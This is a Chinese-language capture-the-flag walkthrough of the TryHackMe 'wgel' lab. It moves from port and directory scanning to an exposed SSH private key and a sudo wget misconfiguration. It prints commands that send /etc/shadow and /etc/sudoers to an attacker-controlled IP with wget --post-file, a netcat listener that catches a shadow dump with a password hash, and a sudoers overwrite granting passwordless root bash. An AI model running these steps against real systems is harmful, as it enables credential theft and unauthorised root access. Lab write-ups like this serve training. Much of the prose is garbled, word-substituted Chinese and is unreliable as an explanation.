服务发现

┌──(rootkali)-[~]└─# nmap -sV -Pn 10.10.106.99    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-25 23:41 EDTNmap scan report for 10.10.106.99Host is up (0.38s latency).Not shown: 998 closed portsPORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 15.12 seconds

目录爆破

┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u http://10.10.106.99 -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-lowercase-2.3-medium.txt _|. _ _  _  _  _ _|_    v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 207627Error Log: /root/dirsearch/logs/errors-21-09-25_23-42-55.logTarget: http://10.10.106.99[23:42:56] Starting: [23:42:58] 301 -  314B  - /sitemap  ->  http://10.10.106.99/sitemap/[23:42:58] 200 -   11KB - /        CTRL+C detected: Pausing threads, please wait...                                                                             Canceled by the user

sitemap是一个叫UNAPP的软件网站介绍页，持续对这个这个网站爆破目录

┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py  -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.106.99/sitemap/ _|. _ _  _  _  _ _|_    v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-26_02-39-06.logTarget: http://10.10.106.99/sitemap/[02:39:07] Starting: [02:39:09] 200 -   21KB - /sitemap/[02:39:09] 301 -  319B  - /sitemap/images  ->  http://10.10.106.99/sitemap/images/[02:39:11] 301 -  316B  - /sitemap/css  ->  http://10.10.106.99/sitemap/css/[02:39:12] 301 -  315B  - /sitemap/js  ->  http://10.10.106.99/sitemap/js/[02:39:19] 301 -  318B  - /sitemap/fonts  ->  http://10.10.106.99/sitemap/fonts/[02:44:16] 301 -  317B  - /sitemap/sass  ->  http://10.10.106.99/sitemap/sass/   

在about页面找到两个开发者的名字

Emily TurnerAdam Morris

做成一个可能的用户账号爆破ssh，用一个小字典，无果

emilyturneremilyturneradammorrisadammorris

在http://10.10.106.99/首页源代码找到一行正文

Jessie don't forget to udate the webiste

确定一个用户名：jessie

在http://10.10.106.99/sitemap/.ssh/找到ssh登录秘钥

Index of /sitemap/.ssh[ICO]    Name    Last modified    Size    Description[PARENTDIR]    Parent Directory         -      [ ]    id_rsa    2019-10-26 09:24     1.6K     Apache/2.4.18 (Ubuntu) Server at 10.10.106.99 Port 80

依据用户名和ssh登录秘钥，登录靶机，拿到user.txt

┌──(rootkali)-[~/tryhackme/wgel]└─# ssh -i id_rsa jessie@10.10.106.99 Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic i686) * Documentation:  https://help.ubuntu.com * Management:     https://landscape.canonical.com * Support:        https://ubuntu.com/advantage8 packages can be updated.8 updates are security updates.Last login: Sun Sep 26 11:59:45 2021 from 10.13.21.169jessie@CorpOne:~$ find / -name user_flag.txtfind: ‘/var/cache/lightdm/dmrc’: Permission deniedfind: ‘/var/cache/cups’: Permission deniedfind: ‘/var/log/speech-dispatcher’: Permission deniedfind: ‘/var/lib/apt/lists/partial’: Permission deniedfind: ‘/var/lib/colord/.cache’: Permission deniedfind: ‘/var/lib/snapd/void’: Permission deniedfind: ‘/var/lib/snapd/cookie’: Permission deniedfind: ‘/var/lib/udisks2’: Permission deniedfind: ‘/var/lib/update-notifier/package-data-downloads/partial’: Permission deniedfind: ‘/var/lib/lightdm-data/lightdm’: Permission deniedfind: ‘/var/lib/lightdm’: Permission deniedfind: ‘/var/lib/polkit-1’: Permission denied/home/jessie/Documents/user_flag.txtjessie@CorpOne:~$ cat /home/jessie/Documents/user_flag.txt057c67131c3d5e42dd5cd3075b198ff6

查看sudo权限

jessie@CorpOne:~$ sudo -lMatching Defaults entries for jessie on CorpOne:    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser jessie may run the following commands on CorpOne:    (ALL : ALL) ALL    (root) NOPASSWD: /usr/bin/wget

把shadow文件传到攻击机

1，监听
nc -lvnp 80

2，发送
sudo -u root /usr/bin/wget --post-file=/etc/shadow 10.13.21.169

3,接管

┌──(rootkali)-[~/tryhackme/wgel]└─# nc -lvnp 80 listening on [any] 80 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.106.99] 60216POST / HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 10.13.21.169Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 1273root:!:18195:0:99999:7:::daemon:*:17953:0:99999:7:::bin:*:17953:0:99999:7:::sys:*:17953:0:99999:7:::sync:*:17953:0:99999:7:::games:*:17953:0:99999:7:::man:*:17953:0:99999:7:::lp:*:17953:0:99999:7:::mail:*:17953:0:99999:7:::news:*:17953:0:99999:7:::uucp:*:17953:0:99999:7:::proxy:*:17953:0:99999:7:::www-data:*:17953:0:99999:7:::backup:*:17953:0:99999:7:::list:*:17953:0:99999:7:::irc:*:17953:0:99999:7:::gnats:*:17953:0:99999:7:::nobody:*:17953:0:99999:7:::systemd-timesync:*:17953:0:99999:7:::systemd-network:*:17953:0:99999:7:::systemd-resolve:*:17953:0:99999:7:::systemd-bus-proxy:*:17953:0:99999:7:::syslog:*:17953:0:99999:7:::_apt:*:17953:0:99999:7:::messagebus:*:17954:0:99999:7:::uuidd:*:17954:0:99999:7:::lightdm:*:17954:0:99999:7:::whoopsie:*:17954:0:99999:7:::avahi-autoipd:*:17954:0:99999:7:::avahi:*:17954:0:99999:7:::dnsmasq:*:17954:0:99999:7:::colord:*:17954:0:99999:7:::speech-dispatcher:!:17954:0:99999:7:::hplip:*:17954:0:99999:7:::kernoops:*:17954:0:99999:7:::pulse:*:17954:0:99999:7:::rtkit:*:17954:0:99999:7:::saned:*:17954:0:99999:7:::usbmux:*:17954:0:99999:7:::jessie:$6$0wv9XLy.$HxqSdXgk7JJ6n9oZ9Z52qxuGCdFqp0qI/9X.a4VRJt860njSusSuQ663bXfIV7y.ywZxeOinj4Mckj8/uvA7U.:18195:0:99999:7:::sshd:*:18195:0:99999:7:::

root明码列的值是"!"，示意该用户被锁，被锁将无奈登陆，然而可能其余的登录形式是不受限制的，如ssh公钥认证的形式，su的形式。

那么就不能够通过替换shadow提权

提权思路

通过wget咱们事实上能够更换靶机上的任何文件，那么咱们当初尝试替换/etc/sudoers文件，把jessie ALL=(root) NOPASSWD: /bin/bash这一行增加到sudoers文件中，而后再笼罩掉靶机上的sudoers文件

这样咱们就能够无需明码切换到root的bash

把/etc/sudoers传回攻击机以备编辑
sudo -u root /usr/bin/wget --post-file=/etc/sudoers 10.13.21.169

编辑sudoers

## This file MUST be edited with the 'visudo' command as root.## Please consider adding local content in /etc/sudoers.d/ instead of# directly modifying this file.## See the man page for details on how to write a sudoers file.#Defaults        env_resetDefaults        mail_badpassDefaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"# Host alias specification# User alias specification# Cmnd alias specification# User privilege specificationroot    ALL=(ALL:ALL) ALL# Members of the admin group may gain root privileges%admin ALL=(ALL) ALL# Allow members of group sudo to execute any command%sudo   ALL=(ALL:ALL) ALL# See sudoers(5) for more information on "#include" directives:#includedir /etc/sudoers.djessie  ALL=(root) NOPASSWD: /usr/bin/wgetjessie  ALL=(root) NOPASSWD: /bin/bash

从靶机下载笼罩编辑好的sudoers文件，胜利提权

jessie@CorpOne:~$ sudo /usr/bin/wget http://10.13.21.169:8000/sudoers -O /etc/sudoers--2021-09-26 12:45:55--  http://10.13.21.169:8000/sudoersConnecting to 10.13.21.169:8000... connected.HTTP request sent, awaiting response... 200 OKLength: 863 [application/octet-stream]Saving to: ‘/etc/sudoers’/etc/sudoers        100%[========================================================================================================================================>]     863  --.-KB/s    in 0,001s  2021-09-26 12:45:55 (1,54 MB/s) - ‘/etc/sudoers’ saved [863/863]jessie@CorpOne:~$ sudo -lMatching Defaults entries for jessie on CorpOne:    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser jessie may run the following commands on CorpOne:    (ALL : ALL) ALL    (root) NOPASSWD: /usr/bin/wget    (root) NOPASSWD: /bin/bashjessie@CorpOne:~$ sudo bashroot@CorpOne:~# cat /root/root_flag.txt b1b968b37519ad1daa6408188649263droot@CorpOne:~#